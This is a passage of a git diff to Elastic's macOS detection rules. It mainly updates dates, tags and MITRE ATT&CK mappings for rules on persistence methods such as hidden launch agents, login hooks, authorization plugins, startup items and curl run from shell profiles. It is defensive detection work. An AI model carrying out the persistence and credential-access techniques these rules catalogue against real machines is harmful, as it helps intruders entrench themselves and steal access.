a/rules/macos/persistence_creation_hidden_login_item_osascript.toml +++ b/rules/macos/persistence_creation_hidden_login_item_osascript.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -43,15 +43,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -97,43 +89,18 @@ AppleScript is a scripting language for automating tasks on macOS, including man [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1547.015" +name = "Login Items" +reference = "https://attack.mitre.org/techniques/T1547/015/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.002" -name = "AppleScript" -reference = "https://attack.mitre.org/techniques/T1059/002/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1647" -name = "Plist File Modification" -reference = "https://attack.mitre.org/techniques/T1647/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/persistence_credential_access_authorization_plugin_creation.toml b/rules/macos/persistence_credential_access_authorization_plugin_creation.toml index 15e61637816..018ccfaa192 100644 --- a/rules/macos/persistence_credential_access_authorization_plugin_creation.toml +++ b/rules/macos/persistence_credential_access_authorization_plugin_creation.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/13" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -48,14 +48,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -103,19 +96,26 @@ Authorization plugins in macOS extend authentication capabilities, enabling feat [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" -[[rule.threat.technique.subtechnique]] -id = "T1547.002" -name = "Authentication Package" -reference = "https://attack.mitre.org/techniques/T1547/002/" +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/persistence_curl_execution_via_shell_profile.toml b/rules/macos/persistence_curl_execution_via_shell_profile.toml index 7be128e76cb..3f1779cb36f 100644 --- a/rules/macos/persistence_curl_execution_via_shell_profile.toml +++ b/rules/macos/persistence_curl_execution_via_shell_profile.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -81,30 +81,30 @@ sequence with maxspan=10s [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Persistence" - id = "TA0003" - reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" - [[rule.threat.technique]] - name = "Event Triggered Execution" - id = "T1546" - reference = "https://attack.mitre.org/techniques/T1546/" - - [[rule.threat.technique.subtechnique]] - name = "Unix Shell Configuration Modification" - id = "T1546.004" - reference = "https://attack.mitre.org/techniques/T1546/004/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.004" +name = "Unix Shell Configuration Modification" +reference = "https://attack.mitre.org/techniques/T1546/004/" - [[rule.threat.technique]] - name = "Ingress Tool Transfer" - id = "T1105" - reference = "https://attack.mitre.org/techniques/T1105/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml b/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml index 1feff70a4d6..67553e9d6fd 100644 --- a/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml +++ b/rules/macos/persistence_defense_evasion_hidden_launch_agent_deamon_logonitem_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -103,36 +103,41 @@ Launchd is a key macOS system process responsible for managing system and user s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1543.001" -name = "Launch Agent" -reference = "https://attack.mitre.org/techniques/T1543/001/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" + [[rule.threat.technique.subtechnique]] id = "T1564.001" name = "Hidden Files and Directories" reference = "https://attack.mitre.org/techniques/T1564/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.001" +name = "Launch Agent" +reference = "https://attack.mitre.org/techniques/T1543/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.004" +name = "Launch Daemon" +reference = "https://attack.mitre.org/techniques/T1543/004/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/macos/persistence_docker_shortcuts_plist_modification.toml b/rules/macos/persistence_docker_shortcuts_plist_modification.toml index 60cccae6d72..42daa3071bf 100644 --- a/rules/macos/persistence_docker_shortcuts_plist_modification.toml +++ b/rules/macos/persistence_docker_shortcuts_plist_modification.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -102,14 +102,18 @@ Docker shortcuts on macOS are managed through dock property lists, which define [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1547" +name = "Boot or Logon Autostart Execution" +reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1547.009" +name = "Shortcut Modification" +reference = "https://attack.mitre.org/techniques/T1547/009/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/persistence_enable_root_account.toml b/rules/macos/persistence_enable_root_account.toml index 5e06d5edddf..bd1836e5468 100644 --- a/rules/macos/persistence_enable_root_account.toml +++ b/rules/macos/persistence_enable_root_account.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/04" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -44,14 +44,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -97,19 +90,26 @@ In macOS environments, the root account is typically disabled to enhance securit [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" -[[rule.threat.technique.subtechnique]] -id = "T1078.003" -name = "Local Accounts" -reference = "https://attack.mitre.org/techniques/T1078/003/" - +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml b/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml index 49dd1c7435c..43ae3627d71 100644 --- a/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml +++ b/rules/macos/persistence_evasion_hidden_launch_agent_deamon_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -101,36 +101,36 @@ Launch agents and daemons in macOS are background services that start at login o [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" -[[rule.threat.technique.subtechnique]] -id = "T1543.001" -name = "Launch Agent" -reference = "https://attack.mitre.org/techniques/T1543/001/" - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1564" name = "Hide Artifacts" reference = "https://attack.mitre.org/techniques/T1564/" + [[rule.threat.technique.subtechnique]] id = "T1564.001" name = "Hidden Files and Directories" reference = "https://attack.mitre.org/techniques/T1564/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.004" +name = "Launch Daemon" +reference = "https://attack.mitre.org/techniques/T1543/004/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/macos/persistence_finder_sync_plugin_pluginkit.toml b/rules/macos/persistence_finder_sync_plugin_pluginkit.toml index 4f500cad3cc..ad0e9957b10 100644 --- a/rules/macos/persistence_finder_sync_plugin_pluginkit.toml +++ b/rules/macos/persistence_finder_sync_plugin_pluginkit.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -102,14 +102,13 @@ Finder Sync plugins enhance macOS Finder by allowing third-party applications to [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/persistence_folder_action_scripts_runtime.toml b/rules/macos/persistence_folder_action_scripts_runtime.toml index 46944a678eb..832dfbbeb8d 100644 --- a/rules/macos/persistence_folder_action_scripts_runtime.toml +++ b/rules/macos/persistence_folder_action_scripts_runtime.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -45,15 +45,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Execution", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -101,26 +93,13 @@ Folder Action scripts on macOS automate tasks by executing scripts when folder c [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/macos/persistence_hidden_plist_filename.toml b/rules/macos/persistence_hidden_plist_filename.toml index 607ab2f4f82..f2211c46f55 100644 --- a/rules/macos/persistence_hidden_plist_filename.toml +++ b/rules/macos/persistence_hidden_plist_filename.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -87,45 +87,40 @@ file where host.os.type == "macos" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Persistence" - id = "TA0003" - reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat.technique]] +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" - [[rule.threat.technique]] - name = "Boot or Logon Autostart Execution" - id = "T1547" - reference = "https://attack.mitre.org/techniques/T1547/" +[[rule.threat.technique.subtechnique]] +id = "T1564.001" +name = "Hidden Files and Directories" +reference = "https://attack.mitre.org/techniques/T1564/001/" - [[rule.threat.technique.subtechnique]] - name = "Plist Modification" - id = "T1547.011" - reference = "https://attack.mitre.org/techniques/T1547/011/" - - [[rule.threat.technique]] - name = "Create or Modify System Process" - id = "T1543" - reference = "https://attack.mitre.org/techniques/T1543/" - - [[rule.threat.technique.subtechnique]] - name = "Launch Agent" - id = "T1543.001" - reference = "https://attack.mitre.org/techniques/T1543/001/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Defense Evasion" - id = "TA0005" - reference = "https://attack.mitre.org/tactics/TA0005/" - - [[rule.threat.technique]] - name = "Hide Artifacts" - id = "T1564" - reference = "https://attack.mitre.org/techniques/T1564/" - - [[rule.threat.technique.subtechnique]] - name = "Hidden Files and Directories" - id = "T1564.001" - reference = "https://attack.mitre.org/techniques/T1564/001/" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.001" +name = "Launch Agent" +reference = "https://attack.mitre.org/techniques/T1543/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1543.004" +name = "Launch Daemon" +reference = "https://attack.mitre.org/techniques/T1543/004/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/macos/persistence_login_logout_hooks_defaults.toml b/rules/macos/persistence_login_logout_hooks_defaults.toml index 40020db35c3..59365456675 100644 --- a/rules/macos/persistence_login_logout_hooks_defaults.toml +++ b/rules/macos/persistence_login_logout_hooks_defaults.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2025/02/04" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -108,14 +108,18 @@ In macOS environments, login and logout hooks are scripts executed automatically [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" +[[rule.threat.technique.subtechnique]] +id = "T1037.002" +name = "Login Hook" +reference = "https://attack.mitre.org/techniques/T1037/002/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/persistence_loginwindow_plist_modification.toml b/rules/macos/persistence_loginwindow_plist_modification.toml index 7603cbada1f..d3fc418339c 100644 --- a/rules/macos/persistence_loginwindow_plist_modification.toml +++ b/rules/macos/persistence_loginwindow_plist_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -67,26 +67,18 @@ event.category:file and host.os.type:macos and not event.type:"deletion" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" +[[rule.threat.technique.subtechnique]] +id = "T1037.002" +name = "Login Hook" +reference = "https://attack.mitre.org/techniques/T1037/002/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1647" -name = "Plist File Modification" -reference = "https://attack.mitre.org/techniques/T1647/" - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/macos/persistence_manual_chromium_extension_loading.toml b/rules/macos/persistence_manual_chromium_extension_loading.toml index 245e2cd90cc..b22050039bd 100644 --- a/rules/macos/persistence_manual_chromium_extension_loading.toml +++ b/rules/macos/persistence_manual_chromium_extension_loading.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -23,15 +23,7 @@ references = [ risk_score = 73 rule_id = "f1f3070e-045c-4e03-ae58-d11d43d2ee51" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Credential Access", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" note = """## Triage and analysis @@ -86,25 +78,17 @@ process where host.os.type == "macos" and event.action == "exec" and [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Persistence" - id = "TA0003" - reference = "https://attack.mitre.org/tactics/TA0003/" - - [[rule.threat.technique]] - name = "Software Extensions" - id = "T1176" - reference = "https://attack.mitre.org/techniques/T1176/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1176" +name = "Software Extensions" +reference = "https://attack.mitre.org/techniques/T1176/" - [rule.threat.tactic] - name = "Credential Access" - id = "TA0006" - reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat.technique.subtechnique]] +id = "T1176.001" +name = "Browser Extensions" +reference = "https://attack.mitre.org/techniques/T1176/001/" - [[rule.threat.technique]] - name = "Steal Web Session Cookie" - id = "T1539" - reference = "https://attack.mitre.org/techniques/T1539/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/macos/persistence_periodic_tasks_file_mdofiy.toml b/rules/macos/persistence_periodic_tasks_file_mdofiy.toml index 003ac42c087..acb351b0c87 100644 --- a/rules/macos/persistence_periodic_tasks_file_mdofiy.toml +++ b/rules/macos/persistence_periodic_tasks_file_mdofiy.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -101,19 +101,13 @@ Periodic tasks in macOS are scheduled operations that automate system maintenanc [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" -[[rule.threat.technique.subtechnique]] -id = "T1053.003" -name = "Cron" -reference = "https://attack.mitre.org/techniques/T1053/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/persistence_python_launch_agent_or_daemon_creation_first_occurrence.toml b/rules/macos/persistence_python_launch_agent_or_daemon_creation_first_occurrence.toml index 2c5cd8c4634..5aa6e70b92d 100644 --- a/rules/macos/persistence_python_launch_agent_or_daemon_creation_first_occurrence.toml +++ b/rules/macos/persistence_python_launch_agent_or_daemon_creation_first_occurrence.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/23" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -73,20 +73,26 @@ process.name:python* [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.001" name = "Launch Agent" reference = "https://attack.mitre.org/techniques/T1543/001/" +[[rule.threat.technique.subtechnique]] +id = "T1543.004" +name = "Launch Daemon" +reference = "https://attack.mitre.org/techniques/T1543/004/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.new_terms] field = "new_terms_fields" value = ["host.id", "file.path"] diff --git a/rules/macos/persistence_screensaver_plist_file_modification.toml b/rules/macos/persistence_screensaver_plist_file_modification.toml index 44791980400..570027ab544 100644 --- a/rules/macos/persistence_screensaver_plist_file_modification.toml +++ b/rules/macos/persistence_screensaver_plist_file_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/10/05" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -101,14 +101,18 @@ file where host.os.type == "macos" and event.action == "modification" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.002" +name = "Screensaver" +reference = "https://attack.mitre.org/techniques/T1546/002/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/persistence_startup_item_plist_creation.toml b/rules/macos/persistence_startup_item_plist_creation.toml index 0ff3d1f2258..cecfc474f78 100644 --- a/rules/macos/persistence_startup_item_plist_creation.toml +++ b/rules/macos/persistence_startup_item_plist_creation.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/30" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -23,14 +23,7 @@ references = [ risk_score = 73 rule_id = "15606250-449d-46a8-aaff-4043e42aefb9" severity = "high" -tags = [ - "Domain: Endpoint", - "OS: macOS", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide" -] +tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" note = """## Triage and analysis @@ -80,17 +73,35 @@ file where host.os.type == "macos" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Persistence" - id = "TA0003" - reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" + +[[rule.threat.technique.subtechnique]] +id = "T1037.005" +name = "Startup Items" +reference = "https://attack.mitre.org/techniques/T1037/005/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1037" +name = "Boot or Logon Initialization Scripts" +reference = "https://attack.mitre.org/techniques/T1037/" - [[rule.threat.technique]] - name = "Boot or Logon Initialization Scripts" - id = "T1037" - reference = "https://attack.mitre.org/techniques/T1037/" +[[rule.threat.technique.subtechnique]] +id = "T1037.005" +name = "Startup Items" +reference = "https://attack.mitre.org/techniques/T1037/005/" - [[rule.threat.technique.subtechnique]] - name = "Startup Items" - id = "T1037.005" - reference = "https://attack.mitre.org/techniques/T1037/005/" +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/macos/persistence_via_atom_init_file_modification.toml b/rules/macos/persistence_via_atom_init_file_modification.toml index eff66a14bca..b1de5ec77cb 100644 --- a/rules/macos/persistence_via_atom_init_file_modification.toml +++ b/rules/macos/persistence_via_atom_init_file_modification.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/21" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -102,14 +102,13 @@ Atom, a popular text editor, allows customization via the `init.coffee` script, [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1037" -name = "Boot or Logon Initialization Scripts" -reference = "https://attack.mitre.org/techniques/T1037/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules/macos/privilege_escalation_applescript_with_admin_privs.toml b/rules/macos/privilege_escalation_applescript_with_admin_privs.toml index ca5bd4627c0..9110c01cb84 100644 --- a/rules/macos/privilege_escalation_applescript_with_admin_privs.toml +++ b/rules/macos/privilege_escalation_applescript_with_admin_privs.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/27" integration = ["endpoint"] maturity = "production" -updated_date = "2025/03/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -99,26 +99,36 @@ AppleScript, a scripting language for macOS, automates tasks by controlling appl [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.002" +name = "AppleScript" +reference = "https://attack.mitre.org/techniques/T1059/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation 